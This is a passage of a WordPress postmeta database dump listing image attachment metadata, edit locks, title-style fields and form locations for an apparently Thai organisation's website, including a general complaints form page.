(1498,448,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/26-67.png\";s:8:\"filesize\";i:3834698;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"26-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116518;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"26-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:996256;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"26-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45255;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"26-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1102296;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"26-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2004619;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"26-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106844;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1500,447,'_thumbnail_id','448'),
(1501,447,'_edit_last','1'),
(1503,447,'title_style','default'),
(1504,447,'_title_style','field_5d1a0217cf408'),
(1505,447,'related',''),
(1506,447,'_related','field_603b51c3e183e'),
(1507,449,'title_style','default'),
(1508,449,'_title_style','field_5d1a0217cf408'),
(1509,449,'related',''),
(1510,449,'_related','field_603b51c3e183e'),
(1511,450,'_edit_lock','1722520765:1'),
(1512,451,'_wp_attached_file','2024/08/27-67.png'),
(1513,451,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/27-67.png\";s:8:\"filesize\";i:3944147;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"27-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114338;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"27-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1085583;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"27-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42361;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"27-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1210480;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"27-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2271940;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"27-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:100831;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1515,450,'_thumbnail_id','451'),
(1516,450,'_edit_last','1'),
(1517,450,'title_style','default'),
(1518,450,'_title_style','field_5d1a0217cf408'),
(1519,450,'related',''),
(1520,450,'_related','field_603b51c3e183e'),
(1521,452,'title_style','default'),
(1522,452,'_title_style','field_5d1a0217cf408'),
(1523,452,'related',''),
(1524,452,'_related','field_603b51c3e183e'),
(1525,453,'_edit_lock','1722520875:1'),
(1526,454,'_wp_attached_file','2024/08/สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว.png'),
(1527,454,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:170:\"2024/08/สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว.png\";s:8:\"filesize\";i:3707227;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:170:\"สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110693;}s:5:\"large\";a:5:{s:4:\"file\";s:171:\"สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:957620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:170:\"สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45089;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:171:\"สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1068104;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:172:\"สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1963833;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:170:\"สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123456;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1529,453,'_thumbnail_id','454'),
(1530,453,'_edit_last','1'),
(1532,453,'title_style','default'),
(1533,453,'_title_style','field_5d1a0217cf408'),
(1534,453,'related',''),
(1535,453,'_related','field_603b51c3e183e'),
(1536,455,'title_style','default'),
(1537,455,'_title_style','field_5d1a0217cf408'),
(1538,455,'related',''),
(1539,455,'_related','field_603b51c3e183e'),
(1540,456,'_edit_lock','1722521035:1'),
(1541,457,'_wp_attached_file','2024/08/28-67.png'),
(1542,457,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/28-67.png\";s:8:\"filesize\";i:4567672;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"28-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132536;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"28-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1231206;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"28-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49483;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"28-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1365272;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"28-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2463307;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"28-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119851;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1544,456,'_thumbnail_id','457'),
(1545,456,'_edit_last','1'),
(1546,456,'title_style','default'),
(1547,456,'_title_style','field_5d1a0217cf408'),
(1548,456,'related',''),
(1549,456,'_related','field_603b51c3e183e'),
(1550,458,'title_style','default'),
(1551,458,'_title_style','field_5d1a0217cf408'),
(1552,458,'related',''),
(1553,458,'_related','field_603b51c3e183e'),
(1554,459,'_edit_lock','1752632243:1'),
(1555,459,'_edit_last','1'),
(1556,459,'title_style','hidden'),
(1557,459,'_title_style','field_5d1a0217cf408'),
(1558,460,'title_style','default'),
(1559,460,'_title_style','field_5d1a0217cf408'),
(1560,461,'title_style','default'),
(1561,461,'_title_style','field_5d1a0217cf408'),
(1563,463,'title_style','default'),
(1564,463,'_title_style','field_5d1a0217cf408'),
(1566,465,'title_style','default'),
(1567,465,'_title_style','field_5d1a0217cf408'),
(1569,467,'title_style','default'),
(1570,467,'_title_style','field_5d1a0217cf408'),
(1571,468,'title_style','default'),
(1572,468,'_title_style','field_5d1a0217cf408'),
(1573,469,'_edit_lock','1724995977:1'),
(1574,469,'_edit_last','1'),
(1575,469,'title_style','default'),
(1576,469,'_title_style','field_5d1a0217cf408'),
(1577,470,'title_style','default'),
(1578,470,'_title_style','field_5d1a0217cf408'),
(1579,471,'title_style','default'),
(1580,471,'_title_style','field_5d1a0217cf408'),
(1582,473,'title_style','default'),
(1583,473,'_title_style','field_5d1a0217cf408'),
(1584,476,'_edit_lock','1751872503:1'),
(1585,474,'wpforms_form_locations','a:0:{}'),
(1586,476,'_edit_last','1'),
(1587,476,'title_style','hidden'),
(1588,476,'_title_style','field_5d1a0217cf408'),
(1589,477,'title_style','default'),
(1590,477,'_title_style','field_5d1a0217cf408'),
(1591,482,'title_style','default'),
(1592,482,'_title_style','field_5d1a0217cf408'),
(1593,483,'title_style','default'),
(1594,483,'_title_style','field_5d1a0217cf408'),
(1595,484,'_edit_lock','1751530382:1'),
(1596,484,'_edit_last','1'),
(1597,484,'title_style','hidden'),
(1598,484,'_title_style','field_5d1a0217cf408'),
(1599,485,'title_style','default'),
(1600,485,'_title_style','field_5d1a0217cf408'),
(1601,486,'wpforms_form_locations','a:1:{i:0;a:6:{s:4:\"type\";s:4:\"page\";s:5:\"title\";s:84:\"ช่องการร้องเรียนเรื่องทั่วไป\";s:7:\"form_id\";i:486;s:2:\"id\";i:484;s:6:\"status\";s:7:\"publish\";s:3:\"url\";s:13:\"/?page_id=484\";}}'),
(1602,492,'title_style','default'),
(1603,492,'_title_style','field_5d1a0217cf408'),
(1605,494,'title_style','default'),
(1606,494,'_title_style','field_5d1a0217cf408'),
(1610,496,'_edit_lock','1722585113:1'),
(1611,497,'_wp_attached_file','2024/08/Screenshot-2024-08-02-143810.jpg'),
(1612,497,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1566;s:6:\"height\";i:738;s:4:\"file\";s:40:\"2024/08/Screenshot-2024-08-02-143810.jpg\";s:8:\"filesize\";i:88168;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-08-02-143810-300x141.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7301;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2024-08-02-143810-1024x483.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38976;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-08-02-143810-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4728;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-08-02-143810-768x362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25102;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:41:\"Screenshot-2024-08-02-143810-1536x724.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68726;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-08-02-143810-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9784;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1613,496,'_edit_last','1'),
(1614,496,'title_style','default'),
(1615,496,'_title_style','field_5d1a0217cf408'),
(1616,498,'title_style','default'),
(1617,498,'_title_style','field_5d1a0217cf408'),
(1618,499,'title_style','default'),
(1619,499,'_title_style','field_5d1a0217cf408'),
(1620,500,'_wp_attached_file','2024/08/No-gift.png'),
(1621,500,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:19:\"2024/08/No-gift.png\";s:8:\"filesize\";i:320110;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"No-gift-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76575;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"No-gift-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32375;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"No-gift-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:332213;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"No-gift-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65597;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1623,502,'title_style','default'),
(1624,502,'_title_style','field_5d1a0217cf408'),
(1625,503,'_wp_attached_file','2024/08/Is-It-a-Gift-Instagram-Post.png'),
(1626,503,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:300;s:4:\"file\";s:39:\"2024/08/Is-It-a-Gift-Instagram-Post.png\";s:8:\"filesize\";i:193439;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36919;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16005;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-768x288.png\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:179418;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58274;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1627,504,'title_style','default'),
(1628,504,'_title_style','field_5d1a0217cf408'),
(1632,506,'_edit_lock','1722952979:1'),
(1633,506,'_generateblocks_dynamic_css_version','1.9.1'),
(1634,506,'_edit_last','1'),
(1635,506,'title_style','default'),
(1636,506,'_title_style','field_5d1a0217cf408'),
(1637,507,'title_style','default'),
(1638,507,'_title_style','field_5d1a0217cf408'),
(1639,508,'title_style','default'),
(1640,508,'_title_style','field_5d1a0217cf408'),
(1641,509,'title_style','default'),
(1642,509,'_title_style','field_5d1a0217cf408'),
(1643,510,'title_style','default'),
(1644,510,'_title_style','field_5d1a0217cf408'),
(1646,512,'title_style','default'),
(1647,512,'_title_style','field_5d1a0217cf408'),
(1649,514,'title_style','default'),
(1650,514,'_title_style','field_5d1a0217cf408'),
(1652,516,'title_style','default'),
(1653,516,'_title_style','field_5d1a0217cf408'),
(1654,520,'_edit_lock','1722914042:1'),
(1655,521,'_wp_attached_file','2024/08/S__68952135.jpg'),
(1656,521,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952135.jpg\";s:8:\"filesize\";i:389341;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952135-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15646;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952135-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113550;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952135-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8488;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952135-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71764;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952135-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:209786;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952135-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19557;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1657,522,'_wp_attached_file','2024/08/S__68952101.jpg'),
(1658,522,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952101.jpg\";s:8:\"filesize\";i:490834;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952101-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16908;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952101-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952101-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8262;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952101-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83189;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952101-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:258057;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952101-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21528;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1659,523,'_wp_attached_file','2024/08/S__68952085.jpg'),
(1660,524,'_wp_attached_file','2024/08/S__68952108.jpg'),
(1661,523,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952085.jpg\";s:8:\"filesize\";i:624263;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952085-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19864;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952085-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172259;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952085-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9817;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952085-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105105;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952085-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:330102;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952085-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25672;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1662,524,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952108.jpg\";s:8:\"filesize\";i:612783;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952108-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20062;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952108-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169105;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952108-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9746;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952108-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103467;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952108-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:322784;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952108-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25721;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1663,525,'_wp_attached_file','2024/08/S__68952130.jpg'),
(1664,526,'_wp_attached_file','2024/08/S__68952132.jpg'),
